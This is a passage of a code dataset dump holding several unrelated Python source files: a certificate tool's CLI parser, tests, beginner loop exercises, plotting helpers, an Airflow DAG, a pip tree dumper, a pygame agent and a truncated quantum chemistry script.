OCSP response validity for certificates for all configured domainsets. Returns exit code 1 if any problem is found, exit code 0 if all is well.\",\n )\n check_ocsp_parser.set_defaults(method=\"check_ocsp\")\n\n # \"check tlsa\" subcommand\n check_tlsa_parser = check_subparsers.add_parser(\n \"tlsa\",\n help=\"Tell certgrinder to lookup TLSA records for the given port and protocol in the DNS and compare with what we have locally, for example: 'certgrinder check tlsa 853 tcp'\",\n )\n check_tlsa_parser.set_defaults(method=\"check_tlsa\")\n check_tlsa_parser.add_argument(\n \"tlsa-port\", type=int, help=\"The port of the service, for example 443\"\n )\n check_tlsa_parser.add_argument(\n \"tlsa-protocol\", help=\"The protocol of the service, for example tcp\"\n )\n\n # \"get\" command\n get_parser = subparsers.add_parser(\n \"get\", help='Use the \"get\" command to get certificates and OCSP responses'\n )\n get_subparsers = get_parser.add_subparsers(\n help=\"Specify what to get using one of the available get sub-commands\",\n dest=\"subcommand\",\n required=True,\n )\n\n # \"get certificate\" subcommand\n get_cert_parser = get_subparsers.add_parser(\n \"certificate\",\n help=\"Tell certgrinder to get new certificate(s), regardless of their current state. Rarely needed, use 'periodic' command instead.\",\n )\n get_cert_parser.set_defaults(method=\"get_certificate\")\n\n # \"get ocsp\" subcommand\n get_ocsp_parser = get_subparsers.add_parser(\n \"ocsp\",\n help=\"Tell certgrinder to get OCSP responses for the configured domainset(s). Rarely needed, use 'periodic' command instead.\",\n )\n get_ocsp_parser.set_defaults(method=\"get_ocsp\")\n\n # \"help\" command\n subparsers.add_parser(\"help\", help='The \"help\" command just outputs the usage help')\n\n # \"periodic\" command\n periodic_parser = subparsers.add_parser(\n \"periodic\",\n help='The \"periodic\" command checks certificates and renews them as needed. Meant to be run from cron or similar daily.',\n )\n periodic_parser.set_defaults(method=\"periodic\")\n\n # \"show\" command\n show_parser = subparsers.add_parser(\n \"show\",\n help='Use the \"show\" command to show certificates, TLSA records, SPKI pins or configuration.',\n )\n show_subparsers = show_parser.add_subparsers(\n help=\"Specify what to show using one of the available show sub-commands\",\n dest=\"subcommand\",\n required=True,\n )\n\n # \"show certificate\" subcommand\n show_certificate_parser = show_subparsers.add_parser(\n \"certificate\", help=\"Tell certgrinder to output information about certificates.\"\n )\n show_certificate_parser.set_defaults(method=\"show_certificate\")\n\n # \"show configuration\" subcommand\n show_subparsers.add_parser(\n \"configuration\", help=\"Tell certgrinder to output the current configuration\"\n )\n\n # \"show paths\" subcommand\n show_paths_parser = show_subparsers.add_parser(\n \"paths\", help=\"Tell certgrinder to output the paths used\"\n )\n show_paths_parser.set_defaults(method=\"show_paths\")\n\n # \"show ocsp\" subcommand\n show_ocsp_parser = show_subparsers.add_parser(\n \"ocsp\", help=\"Tell certgrinder to output information about OCSP responses.\"\n )\n show_ocsp_parser.set_defaults(method=\"show_ocsp\")\n\n # \"show spki\" subcommand\n show_spki_parser = show_subparsers.add_parser(\n \"spki\",\n help=\"Tell certgrinder to generate and print the pin-sha256 spki pins for the public keys it manages.\",\n )\n show_spki_parser.set_defaults(method=\"show_spki\")\n\n # \"show tlsa\" subcommand\n show_tlsa_parser = show_subparsers.add_parser(\n \"tlsa\",\n help=\"Use the 'show tlsa' sub-command to tell certgrinder to generate and print TLSA records for the given service, for example: 'certgrinder show tlsa 443 tcp'\",\n )\n show_tlsa_parser.set_defaults(method=\"show_tlsa\")\n show_tlsa_parser.add_argument(\n \"tlsa-port\", type=int, help=\"The port of the service, for example 443\"\n )\n show_tlsa_parser.add_argument(\n \"tlsa-protocol\", help=\"The protocol of the service, for example tcp\"\n )\n\n # \"show caa\" subcommand\n show_caa_parser = show_subparsers.add_parser(\n \"caa\",\n help=\"Use the 'show caa' sub-command to tell certgrinder to output a CAA record suitable for the specified domainset(s).\",\n )\n show_caa_parser.set_defaults(method=\"show_caa\")\n\n # \"version\" command\n subparsers.add_parser(\n \"version\", help='The \"version\" command just outputs the version of Certgrinder'\n )\n\n # optional arguments\n parser.add_argument(\n \"-a\",\n \"--alternate-chain\",\n dest=\"alternate-chain\",\n action=\"store_true\",\n help=\"Use alternate chain. For production this means using the short chain with 1 intermediate signed by 'ISRG Root X1' instead of using the long chain with 2 intermediates signed by 'DST Root CA X3'. For staging it means using 'Fake LE Root X2' (1 intermediate) instead of the usual 'Fake LE Root X1' (2 intermediates).\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--certgrinderd\",\n dest=\"certgrinderd\",\n help=\"The command to reach the certgrinderd server, will get the input (CSR or cert chain) on stdin. Usually something like 'ssh certgrinderd@server -T'\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--caa-validation-methods\",\n required=False,\n help=\"The ACME validation methods to include when outputting CAA records. Default: dns-01,http-01\",\n dest=\"caa-validation-methods\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--cert-renew-threshold-days\",\n dest=\"cert-renew-threshold-days\",\n type=int,\n help=\"A certificate is renewed when it has less than this many days of lifetime left. Default: `30`\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"-c\",\n \"--config-file\",\n dest=\"config-file\",\n help=\"The path to the certgrinder.yml config file to use\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"-d\",\n \"--debug\",\n action=\"store_const\",\n dest=\"log-level\",\n const=\"DEBUG\",\n help=\"Debug mode. Equal to setting --log-level=DEBUG.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"-D\",\n \"--domain-list\",\n action=\"append\",\n dest=\"domain-list\",\n help=\"Comma separated list of domains for a certificate. Can be specified multiple times.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--invalid-ca-cn-list\",\n action=\"append\",\n dest=\"invalid-ca-cn-list\",\n help=\"The CommonName of an issuer (CA intermediate) to consider invalid. Can be specified multiple times.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"-l\",\n \"--log-level\",\n dest=\"log-level\",\n choices=[\"DEBUG\", \"INFO\", \"WARNING\", \"ERROR\", \"CRITICAL\"],\n help=\"Logging level. One of DEBUG, INFO, WARNING, ERROR, CRITICAL. Defaults to INFO.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"-k\",\n \"--key-type-list\",\n action=\"append\",\n dest=\"key-type-list\",\n choices=[\"rsa\", \"ecdsa\"],\n help=\"The keytypes to enable. Valid values are 'rsa' and 'ecdsa'. Can be specified multiple times. Defaults to both rsa and ecdsa.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"-n\",\n \"--name-server\",\n dest=\"name-server\",\n help=\"Tell certgrinder to use this DNS server IP to lookup TLSA records. Only relevant with -c / --checktlsa. Only v4/v6 IPs, no hostnames.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--now\",\n dest=\"periodic-sleep-minutes\",\n action=\"store_const\",\n const=0,\n help=\"Run periodic command without delay. Equal to setting --periodic-sleep-minutes 0.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"-o\",\n \"--ocsp-renew-threshold-percent\",\n dest=\"ocsp-renew-threshold-percent\",\n type=int,\n choices=range(0, 101),\n metavar=\"OCSP-RENEW-THRESHOLD-PERCENT\",\n help=\"An integer between 0 and 100 specifying the amount of time in percent between ``produced_at`` and ``next_update`` which must have passed before an OCSP response is considered too old. Defaults to 50.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--path\",\n dest=\"path\",\n help=\"Tell certgrinder to use the specified directory for keys, CSRs and certificates. The directory must exist and be writeable by the user running certgrinder.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--periodic-sleep-minutes\",\n dest=\"periodic-sleep-minutes\",\n type=int,\n help=\"Tell certgrinder to sleep for a random number of minutes between 0 and this number before doing anything when the periodic command is used. Set to 0 to disable sleeping.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"-p\",\n \"--pid-dir\",\n dest=\"pid-dir\",\n help=\"The directory to store the PID file in\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--post-renew-hooks\",\n action=\"append\",\n dest=\"post-renew-hooks\",\n help=\"The list of commands to run after one or more certificates are renewed. Most such commands will need root access to run, remember to prefix the command with 'sudo' as needed. Can be specified multiple times. Default: `None`\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--post-renew-hooks-dir\",\n dest=\"post-renew-hooks-dir\",\n help=\"Path to a folder containing executables to run after one or more certificates or OCSP responses are renewed. These will execute under the regular certgrinder user uid, so make sure to use sudo/doas in scripts or suid executables as needed. Default: `None`\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--post-renew-hooks-dir-runner\",\n dest=\"post-renew-hooks-dir-runner\",\n help=\"Path to an executable like sudo to be used to run each of the executables in the post renew hooks dir. Default: `None`\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"-q\",\n \"--quiet\",\n action=\"store_const\",\n dest=\"log-level\",\n const=\"WARNING\",\n help=\"Quiet mode. No output at all if there is nothing to do, and no errors are encountered. Equal to setting --log-level=WARNING.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"-s\",\n \"--staging\",\n dest=\"staging\",\n action=\"store_true\",\n help=\"Staging mode. Sets --acme-server-url https://acme-staging-v02.api.letsencrypt.org/directory and --invalid-ca-cn-list empty. Use this while playing around to avoid hitting rate limits!\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--syslog-facility\",\n dest=\"syslog-facility\",\n help=\"The syslog facility to use. Set this and syslog-socket to enable logging to syslog.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--syslog-socket\",\n dest=\"syslog-socket\",\n help=\"The syslog socket to connect to. Set this and syslog-facility to enable logging to syslog.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--tlsa-port\",\n dest=\"tlsa-port\",\n type=int,\n help=\"The service port number (like 443) for TLSA operations.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--tlsa-protocol\",\n dest=\"tlsa-protocol\",\n help=\"The service protocol (like tcp) for TLSA operations.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--tlsa-type-list\",\n action=\"append\",\n dest=\"tlsa-type-list\",\n choices=[\"310\", \"311\", \"312\"],\n help=\"Enables a TLSA type for TLSA operations. Can be specified multiple times.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"-v\",\n \"--version\",\n dest=\"version\",\n action=\"store_true\",\n help=\"Show version and exit.\",\n default=argparse.SUPPRESS,\n )\n return parser\n\n\ndef parse_args(\n mockargs: typing.Optional[typing.List[str]] = None,\n) -> typing.Tuple[argparse.ArgumentParser, argparse.Namespace]:\n \"\"\"Create an argparse monster and parse mockargs or sys.argv[1:].\"\"\"\n parser = get_parser()\n args = parser.parse_args(mockargs if mockargs else sys.argv[1:])\n return parser, args\n\n\ndef main(mockargs: typing.Optional[typing.List[str]] = None) -> None:\n \"\"\"Initialise script and ``Certgrinder()`` object, then call ``certgrinder.grind()``.\n\n Parse command-line arguments, read config file if needed, configure logging,\n and then call ``certgrinder.grind()`` method.\n \"\"\"\n # get parser and parse args\n parser, args = parse_args(mockargs)\n\n # handle a couple of special cases before reading config\n if args.command == \"version\" or hasattr(args, \"version\"):\n print(f\"Certgrinder version {__version__}\")\n sys.exit(0)\n if args.command == \"help\":\n parser.print_help()\n sys.exit(0)\n\n # read and parse the config file\n if hasattr(args, \"config-file\"):\n with open(getattr(args, \"config-file\")) as f:\n try:\n config = yaml.load(f, Loader=yaml.SafeLoader)\n except Exception:\n logger.exception(\n f\"Unable to parse YAML config file {getattr(args, 'config-file')} - bailing out.\"\n )\n sys.exit(1)\n else:\n # we have no config file\n config = {}\n\n # update file config (if any) with command-line arguments,\n # so they take precedence over config file configuration\n config.update(vars(args))\n\n # remove command and subcommand (part of argparse internals)\n if \"command\" in config:\n del config[\"command\"]\n if \"subcommand\" in config:\n del config[\"subcommand\"]\n\n # configure certgrinder\n certgrinder = Certgrinder()\n certgrinder.configure(userconfig=config)\n\n # if the command is \"show configuration\" just output certgrinder.conf and exit now\n if args.command == \"show\" and args.subcommand == \"configuration\":\n logger.info(\"Current certgrinder configuration:\")\n pprint(certgrinder.conf)\n sys.exit(0)\n\n # call main method\n certgrinder.grind(args)\n\n\ndef init() -> None:\n \"\"\"This is here just as a testable way of calling main().\"\"\"\n if __name__ == \"__main__\":\n with PidFile(\"certgrinder\"):\n main()\n\n\ninit()\n","repo_name":"tykling/certgrinder","sub_path":"client/certgrinder/certgrinder.py","file_name":"certgrinder.py","file_ext":"py","file_size_in_byte":89402,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"94"} +{"seq_id":"1479158206","text":"import os\nfrom unittest import TestCase\nfrom unittest.mock import MagicMock\n\nfrom dataforseo_sdk.keywords.keyword_service import KeywordService\n\nRANKED_KEYWORDS_RESPONSE_FILE = os.path.realpath(\n os.path.join(\n os.path.realpath(__file__),\n \"..\",\n \"data\",\n \"api.dataforseo.com.v3-dataforseo_labs-ranked_keywords-live.20220225T163613.078371.json\",\n )\n)\n\nTEST_API_USERNAME = \"username\"\nTEST_API_PASSWORD = \"api_key\"\n\n\nclass TestKeywordService(TestCase):\n def read_test_data_file(self, file_name):\n with open(file_name, \"r\", encoding=\"utf-8\") as fh:\n return fh.read()\n\n def test_ranked_keywords(self):\n ranked_keywords_test_data = self.read_test_data_file(\n RANKED_KEYWORDS_RESPONSE_FILE\n )\n mock_rest_client = MagicMock()\n mock_rest_client.post.return_value = ranked_keywords_test_data\n\n target_domain = \"afishingaddiction.com\"\n keyword_service = KeywordService(client=mock_rest_client)\n keyword_service._location_code = 2840\n keyword_service._language_code = \"en\"\n\n ranked_keywords = keyword_service.ranked_keywords(target_domain=target_domain)\n\n assert ranked_keywords == ranked_keywords_test_data\n","repo_name":"lieutdan13/dataforseo_sdk","sub_path":"tests/keywords/test_keyword_service.py","file_name":"test_keyword_service.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"70720517430","text":"is_learning = True\nwhile is_learning:\n print(\"learning\")\n is_learning = False\n \nis_learning = True\nwhile is_learning:\n print(\"learning\")\n is_learning = input(\"are they still learning\")\n \nis_learning = True\nwhile is_learning:\n print(\"You are learning\")\n user_input = input(\"They are learning\")\n is_learning == user_input == \"Yes\"\n \nuser_input = input(\"Do you wish to run the program? (yes/no)\")\n\nwhile user_input == \"yes\":\n print(\"We are running\")\n user_input = input(\"Do you wish to run the program?(yes/no)\")\n\nprint(\"We stopped running\")\n \nuser_input = int(input(\"Enter number\"))\nwhile user_input < 10:\n print(\"Your number was less than 10.\")\n user_input = int(input(\"select another\"))\n \nprint(\"Your number was at least 10.\")\n\nq = input(\"enter q\")\np = input(\"enter p\")\nuser_input = input(\"enter p or q\")\nwhile user_input != q:\n if user_input == p:\n print(\"Hello\")\n user_input = input(\"enter p or q\")\n\ntarget_number = 40\nguess = int(input(\"enter number\"))\nwhile guess != target_number:\n print(\"wrong\")\n if guess > target_number:\n print(\"High\")\n else:\n print(\"low\")\n guess = int(input(\"enter number\"))\nprint(\"you select a successfully\")\n\nsample_string = \"Python\"\nfor string in sample_string:\n if string == \"o\":\n continue\n print(string)\n \n \n \n\n","repo_name":"amar13617/python_fundamentals","sub_path":"while_loop.py","file_name":"while_loop.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"32915480060","text":"def function(number):\n even_numbers_list = [0, 2, 4, 6, 8]\n if number in even_numbers_list:\n return True\n else:\n return False\n\n\ndef int_function(integer):\n if isinstance(integer, int):\n return True\n else:\n return False\n\n\nnumbers_list = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\nfiltered_list = list(filter(function, numbers_list))\nprint(filtered_list)\n\nprint(\"Enter numbers : \")\n# integer_list = list(input().split())\nfilter_list = list(filter(int_function, list(map(int, input().split()))))\nprint(filter_list)\n\nprint(\"Enter integers : \")\nint_filter_list = list(filter(int, list(map(int, input().split()))))\nprint(int_filter_list)\n\nsample_list = [\"fjsd\", \"dsfklj\", 5.9, 0, 87]\nfilter_sample_list = list(filter(int_function, sample_list))\nprint(filter_sample_list)\n","repo_name":"lokeshsonawane95/python_map_filter_reduce","sub_path":"filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"74686011828","text":"import torch\nimport matplotlib.pyplot as plt\n\n\ndef plot_loss(loss_graph):\n # Visualize the loss as the network trained\n # Should be a downward trend\n plt.plot(loss_graph)\n plt.title(\"Training loss plot: Rating Ranges model\")\n plt.xlabel(\"Epoch\")\n plt.xticks([i for i in range(0, len(loss_graph) + 1, 2)])\n plt.ylabel(\"Loss\")\n plt.savefig(\"temp/loss_plot.png\")\n\n\ndef get_cutoff_value(tensor, percentage):\n cutoff = int(percentage * len(tensor))\n cutoff_value, _ = torch.kthvalue(tensor, cutoff)\n return cutoff_value.item()\n\n\ndef compare_results(predictions, y_test):\n error = torch.abs(predictions - y_test)\n print(f\"Mean error: {error.mean()}\")\n fiftieth_percentile = get_cutoff_value(error, 0.5)\n print(f\"50th percentile: {fiftieth_percentile}\")\n ninetieth_percentile = get_cutoff_value(error, 0.9)\n print(f\"90th percentile: {ninetieth_percentile}\")\n\n plot_predictions(predictions, y_test, fiftieth_percentile,\n ninetieth_percentile)\n\n\ndef plot_predictions(predictions, y_test, fifty=None, ninety=None):\n fig, axs = plt.subplots(1, 1)\n samples = 1500\n axs.plot(y_test[:samples], predictions[:samples], 'o', label=\"Predicted vs Real\")\n\n # the closer to this line the better\n axs.plot([800, 2800], [800, 2800], 'r-', label=\"Perfect prediction\")\n axs.plot([800, 2800], [800 + fifty, 2800 + fifty],\n 'g--', label=\"50% of data\")\n # these two lines show acceptable error (200 elo)\n axs.plot([800, 2800], [800 - fifty, 2800 - fifty], 'g--', label=\"\")\n\n axs.plot([800, 2800], [800 + ninety, 2800 + ninety],\n 'm--', label=\"90% of data\")\n axs.plot([800, 2800], [800 - ninety, 2800 - ninety], 'm--',\n label=\"\") # these two lines encompass 90% of the data\n\n axs.set_title(f\"Real vs Predicted\\nRating Ranges model\")\n\n axs.set_xlabel(\"Real\")\n axs.set_ylabel(\"Predicted\")\n\n axs.set_xlim(600, 3000)\n axs.set_ylim(600, 3000)\n\n axs.grid()\n axs.legend()\n\n fig.savefig(\"temp/predictions.png\")\n plt.show()","repo_name":"HliasOuzounis/Ai-Guess-the-elo","sub_path":"elo_ai/helper_functions/plot_results.py","file_name":"plot_results.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"94"} +{"seq_id":"197529227","text":"from __future__ import absolute_import\n\nimport os\nfrom datetime import timedelta\n\nfrom airflow import DAG\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.contrib.operators.bigquery_to_gcs import BigQueryToCloudStorageOperator\nfrom dependencies import airflow_utils\nfrom dependencies.airflow_utils import get_ds_month, get_ds_year, get_ds_day, default_args\n\n# The goal of this DAG is to perform a complete pull of police unit assignment data from\n# the InTime API. This employee info will be stored in Data Rivers and extracted via PowerShell\n# to be merged into the Police Active Directory.\n\ndag = DAG(\n 'intime_employees',\n default_args=default_args,\n schedule_interval='@hourly',\n user_defined_filters={'get_ds_month': get_ds_month, 'get_ds_year': get_ds_year,\n 'get_ds_day': get_ds_day},\n max_active_runs=1\n)\n\n# initialize gcs locations\ndataset = \"intime\"\nbucket = f\"gs://{os.environ['GCS_PREFIX']}_{dataset}\"\npath = \"employees/{{ ds|get_ds_year }}/{{ ds|get_ds_month }}/{{ ds|get_ds_day }}/{{ run_id }}\"\njson_loc = f\"{path}_records.json\"\n\nintime_employees_gcs = BashOperator(\n task_id='intime_employees_gcs',\n bash_command=f\"python {os.environ['GCS_LOADER_PATH']}/intime_employees_gcs.py --output_arg {json_loc}\",\n execution_timeout=timedelta(hours=1),\n dag=dag\n)\n\nintime_employees_pandas = BashOperator(\n task_id='intime_employees_pandas',\n bash_command=f\"python {os.environ['PANDAS_ETL_PATH']}/intime_employees_pandas.py --input {json_loc}\",\n dag=dag\n)\n\n# Export table to IAPro bucket as readable CSV\nintime_iapro_export = BigQueryToCloudStorageOperator(\n task_id='intime_iapro_export',\n source_project_dataset_table=f\"{os.environ['GCLOUD_PROJECT']}.{dataset}.employee_data\",\n destination_cloud_storage_uris=[f\"gs://{os.environ['GCS_PREFIX']}_iapro/intime_report.csv\"],\n bigquery_conn_id='google_cloud_default',\n dag=dag\n)\n\nintime_employees_gcs >> intime_employees_pandas >> intime_iapro_export\n","repo_name":"CityofPittsburgh/data-rivers","sub_path":"af2_dags/intime_employees_airflow.py","file_name":"intime_employees_airflow.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"94"} +{"seq_id":"1106614651","text":"\nimport re \nimport os \nimport sys \nimport json \nimport subprocess \nfrom pathlib import Path \nfrom argparse import ArgumentParser\n\ndef open_output_file (path, *args, **kwargs):\n if path:\n return open(path, *args, **kwargs)\n else:\n fd = os.dup(sys.stdout.fileno())\n return os.fdopen(fd, *args, **kwargs)\n\ndef list_pip_installed ():\n packages = list()\n process = subprocess.run([\"pip\", \"freeze\"], shell=True, text=True, stdout=subprocess.PIPE, check=True)\n for line in process.stdout.strip().split(\"\\n\"):\n matchresult = re.match(r\"^(\\S+?)==\\S+$\", line)\n if matchresult:\n name, = matchresult.groups()\n packages.append(name)\n continue\n matchresult = re.match(r\"^(\\S+?) @ .*$\", line)\n if matchresult:\n name, = matchresult.groups()\n packages.append(name)\n continue\n matchresult = re.match(r\"^# Editable install with no version control \\((\\S+?)==.*$\", line)\n if matchresult:\n name, = matchresult.groups()\n packages.append(name)\n continue\n return packages\n\ndef get_pip_info (package):\n packageinfo = dict()\n process = subprocess.run([\"pip\", \"show\", package], shell=True, text=True, stdout=subprocess.PIPE, check=True)\n for line in process.stdout.strip().split(\"\\n\"):\n matchresult = re.match(r\"(.*?):(.*)\", line)\n if matchresult:\n key, value = matchresult.groups()\n if value.strip():\n if key.strip() == \"Requires\":\n packageinfo[key.strip()] = [val.strip() for val in value.split(\",\")]\n elif key.strip() == \"Required-by\":\n packageinfo[key.strip()] = [val.strip() for val in value.split(\",\")]\n else:\n packageinfo[key.strip()] = value.strip()\n return packageinfo\n\ndef get_pip_info_tree (packages):\n packageinfos = list()\n packageinfotable = dict()\n for package in packages:\n if package not in packageinfotable:\n packageinfotable[package] = get_pip_info(package)\n packageinfo = packageinfotable[package]\n packageinfos.append(packageinfo)\n packageinfostack = packageinfos.copy()\n while packageinfostack:\n packageinfo = packageinfostack.pop()\n if \"Dependencies\" not in packageinfo:\n for pkg in packageinfo.get(\"Requires\", []):\n if pkg not in packageinfotable:\n packageinfotable[pkg] = get_pip_info(pkg)\n pkginfo = packageinfotable[pkg]\n packageinfo.setdefault(\"Dependencies\", [])\n packageinfo[\"Dependencies\"].append(pkginfo)\n packageinfostack.append(pkginfo)\n return packageinfos\n\ndef dump_pip_info_tree (packageinfos, *, _depth=0, indent=2, file=sys.stdout):\n for packageinfo in packageinfos:\n if _depth:\n print(\"{:s}- {:s}=={:s}\".format(\" \" * _depth, packageinfo[\"Name\"], packageinfo[\"Version\"]), file=file)\n else:\n print(\"{:s}=={:s}\".format(packageinfo[\"Name\"], packageinfo[\"Version\"]), file=file)\n dump_pip_info_tree(packageinfo.get(\"Dependencies\", []), _depth=_depth + indent, indent=indent, file=file)\n\ndef main ():\n parser = ArgumentParser(description=\"Dump installed package info by pip.\")\n parser.add_argument(\"packages\", nargs=\"*\", help=\"Package names for dump.\")\n parser.add_argument(\"--json\", action=\"store_true\", help=\"Dump information as JSON format.\")\n parser.add_argument(\"--indent\", nargs=\"?\", default=2, help=\"Amount of indentation depth.\")\n parser.add_argument(\"--dump-root-only\", action=\"store_true\", help=\"If enabled, show root packages only.\")\n parser.add_argument(\"-o\", \"--output-file\", type=Path, help=\"Path of output file. (default is stdout).\")\n parser.add_argument(\"-v\", \"--version\", action=\"version\", version=\"%(prog)s 0.1.0\")\n args = parser.parse_args()\n if args.packages:\n packages = args.packages\n else:\n packages = list_pip_installed()\n packageinfos = get_pip_info_tree(packages)\n if args.dump_root_only: #--dump-root-onlyが真ならば親をもたないパッケージのみ抽出する。\n packageinfos = [packageinfo for packageinfo in packageinfos if not packageinfo.get(\"Required-by\", [])]\n with open_output_file(args.output_file, \"w\", encoding=\"utf-8\") as stream:\n if args.json:\n json.dump(packageinfos, stream, indent=args.indent)\n else:\n dump_pip_info_tree(packageinfos, file=stream, indent=args.indent)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Tikubonn/pip-tree","sub_path":"pip_tree/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"71052306228","text":"from dis import dis\r\nimport pygame\r\nfrom pygame.locals import *\r\nimport random\r\nimport math\r\nimport Constants\r\nfrom Agent import Agent\r\n\r\nclass Sheep(Agent):\r\n\r\n\tdef __init__(self, image, pos, size, spd, color, turnSpd):\r\n\t\tsuper().__init__(image, pos, size, spd, color, turnSpd)\r\n\t\tself.isFleeing = False\r\n\t\tself.targetPos = None\r\n\t\tself.ticks = pygame.time.get_ticks()\r\n\t\r\n\tdef switchMode(self):\r\n\t\tif self.isFleeing:\r\n\t\t\tself.isFleeing = False\r\n\t\telse:\r\n\t\t\tself.isFleeing = True\r\n\r\n\tdef isPlayerClose(self, player):\r\n\t\tdistance = self.pos - player.pos\r\n\t\tif distance.length() < Constants.FLEE_RANGE:\r\n\t\t\tself.isFleeing = True\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tself.isFleeing = False\r\n\t\t\treturn False\r\n\r\n\tdef calcTrackingVelocity(self, player):\r\n\t\tself.targetPos = player.center\r\n\r\n\tdef updateDirectionTime(self):\r\n\t\tticks = pygame.time.get_ticks() - self.ticks\r\n\t\tif ticks > 1000:\r\n\t\t\tself.ticks = pygame.time.get_ticks()\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\treturn False\r\n\r\n\tdef update(self, bounds, screen, player):\r\n\r\n\t\t# initialize velocity\r\n\t\tif pygame.Vector2.length(self.vel) == 0:\r\n\t\t\tangle = math.acos(random.randrange(-1, 1))\r\n\t\t\tself.vel = pygame.Vector2(math.cos(angle), math.sin(angle)) * self.spd\r\n\t\t\r\n\t\t#check if player is close\r\n\t\tself.isFleeing = self.isPlayerClose(player)\r\n\r\n\t\t# get boundary forces for sum\r\n\t\tboundsForce = self.computeBoundaryForces(bounds, screen)\r\n\r\n\t\t# wander if player isn't close\r\n\t\tif not self.isFleeing:\r\n\r\n\t\t\tif self.updateDirectionTime() == True:\r\n\t\t\t\ttheta = math.radians(random.randrange(-100, 100) / 100)\r\n\r\n\t\t\t\tpickTurn = random.randint(0, 100)\r\n\t\t\t\tif pickTurn < 50:\r\n\t\t\t\t\ttheta += 0\r\n\t\t\t\telse:\r\n\t\t\t\t\ttheta += 180\r\n\r\n\t\t\t\t#apply wander force\t\t\t\r\n\t\t\t\twanderDir = pygame.Vector2.normalize(self.vel) + pygame.Vector2(math.cos(theta), math.sin(theta))\r\n\t\t\t\twanderDirForce = wanderDir * Constants.ENEMY_WANDER_FORCE\r\n\t\t\t\twanderDirForceNorm = pygame.Vector2.normalize(wanderDirForce)\r\n\r\n\t\t\t\ttotalForce = wanderDirForceNorm + boundsForce\r\n\t\t\telse:\r\n\t\t\t\ttotalForce = boundsForce\r\n\r\n\t\t# otherwise, flee\r\n\t\telse:\r\n\t\t\t#apply flee force\r\n\t\t\t#store the calculated, normalized direction to the dog\r\n\t\t\tdirToDog = pygame.Vector2.normalize(player.pos - self.pos)\r\n\r\n\t\t\t#scale direction by the weight of this force to get applied force\r\n\t\t\tdirToDogForce = -dirToDog * Constants.ENEMY_FLEE_FORCE\r\n\t\t\t\t\t\t\r\n\t\t\ttotalForce = dirToDogForce + boundsForce\r\n\r\n\t\t\tself.calcTrackingVelocity(player)\r\n\t\t\t\t\t\r\n\t\t# prevent sheep from turning on a dime\r\n\t\tself.clampTurn(Constants.ENEMY_TURN_SPEED, totalForce)\r\n\r\n\t\t# update the agent\r\n\t\tsuper().update(bounds, screen)\r\n\r\n\tdef draw(self, screen):\r\n\t\tif self.isFleeing == True:\r\n\t\t\tpygame.draw.line(screen, (0, 0, 255), self.center, self.targetPos, 3)\r\n\r\n\t\tsuper().draw(screen)\r\n","repo_name":"cburel/DrivingSheep","sub_path":"DrivingSheep/MovingAgents/Enemy.py","file_name":"Enemy.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"1217738630","text":"#!/usr/bin/env python\n#\n# Author: Qiming Sun \n#\n\nimport tempfile\nimport numpy\nimport h5py\nfrom pyscf import gto, scf, ao2mo\n\n'''\nUHF-MP2\n'''\n\nmol = gto.M(\n verbose = 0,\n atom = 'O 0 0 0; O 0 0 1.2',\n basis = 'ccpvdz',\n spin = 2)\n\nm = scf.UHF(mol)\nprint(m.scf())\n\ndef myump2(mol, mo_energy, mo_coeff, mo_occ):\n o = numpy.hstack((mo_coeff[0][:,mo_occ[0]>0] ,mo_coeff[1][:,mo_occ[1]>0]))\n v = numpy.hstack((mo_coeff[0][:,mo_occ[0]==0],mo_coeff[1][:,mo_occ[1]==0]))\n eo = 